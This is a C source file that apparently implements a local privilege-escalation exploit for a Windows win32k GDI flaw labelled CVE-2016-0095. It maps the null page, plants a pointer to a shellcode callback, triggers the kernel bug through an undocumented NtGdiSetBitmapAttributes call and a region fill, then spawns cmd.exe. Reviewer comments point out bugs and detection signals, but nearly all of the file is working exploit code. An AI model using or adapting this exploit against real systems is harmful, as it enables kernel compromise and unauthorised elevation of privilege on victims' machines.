#include <Windows.h>
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "user32.lib")

/* Undocumented win32k syscall stub; not exported by a public import library,
 * so it must be resolved/linked elsewhere in the project (not shown here). */
EXTERN_C HBITMAP NTAPI NtGdiSetBitmapAttributes(HBITMAP argv0, DWORD argv1);
/* Defined outside this file (likely an assembly unit); invoked from Call(). */
EXTERN_C ULONG64 ShellCode();

/* Generic WINAPI function-pointer type used for GetProcAddress results.
 * NOTE(review): declared with no parameters, yet NullPageAlloc() calls it
 * with six arguments — relies on the compiler accepting the mismatch. */
typedef void* (WINAPI* MYWINAPIPTR)(void);

/*
 * Create a small 1-bpp GDI bitmap and return its handle.
 *
 * The BITMAP initializer fills the fields in declaration order:
 * bmType=0, bmWidth=8, bmHeight=8, bmWidthBytes=2, bmPlanes=1, bmBitsPixel=1.
 * bmBits is attached afterwards because it points at the static pixel array.
 *
 * Returns the HBITMAP cast to unsigned int; the caller casts it back.
 * Neither the last-error state nor a NULL handle is checked.
 */
unsigned int demo_CreateBitmapIndirect(void) {
	static BITMAP bitmap = { 0, 8, 8, 2, 1, 1 };
	/* 8 rows x 2 bytes per row (bmWidthBytes), 1 bit per pixel */
	static BYTE bits[8][2] = { 0xFF, 0, 0x0C, 0, 0x0C, 0, 0x0C, 0,0xFF, 0, 0xC0, 0, 0xC0, 0, 0xC0, 0 };
	bitmap.bmBits = bits;
	SetLastError(NO_ERROR);
	HBITMAP hBitmap = CreateBitmapIndirect(&bitmap);
	return (unsigned int)hBitmap;
}

/*
 * Drive the vulnerable win32k code path (CVE-2016-0095, per the file name).
 *
 * Sequence: create a bitmap, alter it through the undocumented
 * NtGdiSetBitmapAttributes call, build a region and a memory DC, select the
 * bitmap into the DC, then FillRgn() it with a solid brush. The function name
 * indicates the fill is expected to fault inside the kernel; which step
 * actually triggers the bug is not visible from this file.
 *
 * No return values are checked and no GDI objects are released, so on a
 * patched system this simply leaks a bitmap, region, DC and brush.
 * From a monitoring standpoint, a user process calling NtGdiSetBitmapAttributes
 * with an unusual attribute value is the notable event here.
 */
void Trigger_BSoDPoc() {
	HBITMAP hBitmap1 = (HBITMAP)demo_CreateBitmapIndirect();
	/* 0x8f9: attribute flags passed to the undocumented syscall; meaning not documented here */
	HBITMAP hBitmap2 = (HBITMAP)NtGdiSetBitmapAttributes((HBITMAP)hBitmap1, (DWORD)0x8f9);

	/* Only left/top are set; right/bottom stay 0, giving a degenerate rectangle. */
	RECT rect = { 0 };
	rect.left = 0x368c;
	rect.top = 0x400000;
	HRGN hRgn = (HRGN)CreateRectRgnIndirect(&rect);

	/* Memory DC compatible with the screen; the attributed bitmap becomes its surface. */
	HDC hdc = (HDC)CreateCompatibleDC((HDC)0x0);
	SelectObject((HDC)hdc, (HGDIOBJ)hBitmap2);

	HBRUSH hBrush = (HBRUSH)CreateSolidBrush((COLORREF)0x00edfc13);

	/* Expected crash/trigger point (inferred from the function name). */
	FillRgn((HDC)hdc, (HRGN)hRgn, (HBRUSH)hBrush);
}

/*
 * Callback whose address is planted in the null page by NullPageAlloc().
 *
 * The four int parameters are unused; they exist so the __stdcall frame
 * matches whatever the kernel-side caller is expected to push (not shown
 * here). It simply forwards to the external ShellCode() routine and
 * returns 0.
 */
int __stdcall Call(int one, int two, int three, int four)
{
	ShellCode();
	return 0;
}

/*
 * Map the process null page and seed it with the values the exploit expects.
 *
 * NtAllocateVirtualMemory is resolved from ntdll by name; the requested base
 * 0x100 lies inside the first page, so the allocation covers address 0.
 * The page is zeroed, two flag bytes at 0x858 / 0x85A are set to 1, and a
 * pointer to Call() is stored at 0xA98. The offsets are specific to the
 * targeted kernel structure and are not explained in this file.
 *
 * NOTE(review): the allocation result is never checked. Mapping the null page
 * from user mode is blocked by default on Windows 8 and later, so on such
 * systems the memset() below dereferences an unmapped address and the
 * process crashes instead. Null-page allocation by an unprivileged process is
 * itself a strong detection signal for this class of exploit.
 */
void NullPageAlloc()
{
	HMODULE hntdll = GetModuleHandle(TEXT("ntdll"));
	MYWINAPIPTR NtAllocateVirtualMemory = (MYWINAPIPTR)GetProcAddress(hntdll, "NtAllocateVirtualMemory");
	PVOID addr = (PVOID)0x100;
	ULONG64 size = 0x1000;
	/* Called through a (void) prototype with six arguments; see MYWINAPIPTR. */
	NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	DWORD * p = NULL;	/* unused */
	/* Zero the freshly mapped page starting at address 0. */
	memset(0x0, 0, 0x1000);

	/* Two one-byte flags read by the kernel path being exploited (inferred from names). */
	void* bypass_one = (void *)0x858;
	*(LPBYTE)bypass_one = 0x1;
	void* bypass_two = (void *)0x85A;
	*(LPBYTE)bypass_two = 0x1;

	/* Function pointer the kernel is expected to dispatch through. */
	void* call_addr = (void *)0xA98;
	*(LPVOID*)call_addr = (LPVOID)Call;
}

/*
 * Entry point: prepare the null page, drive the vulnerable GDI path, then
 * spawn cmd.exe. The shell is presumably expected to inherit whatever
 * ShellCode() changed about the process token; nothing here verifies that
 * the trigger succeeded before spawning.
 */
int main()
{
	NullPageAlloc();
	Trigger_BSoDPoc();
	system("cmd");
	return 0;
}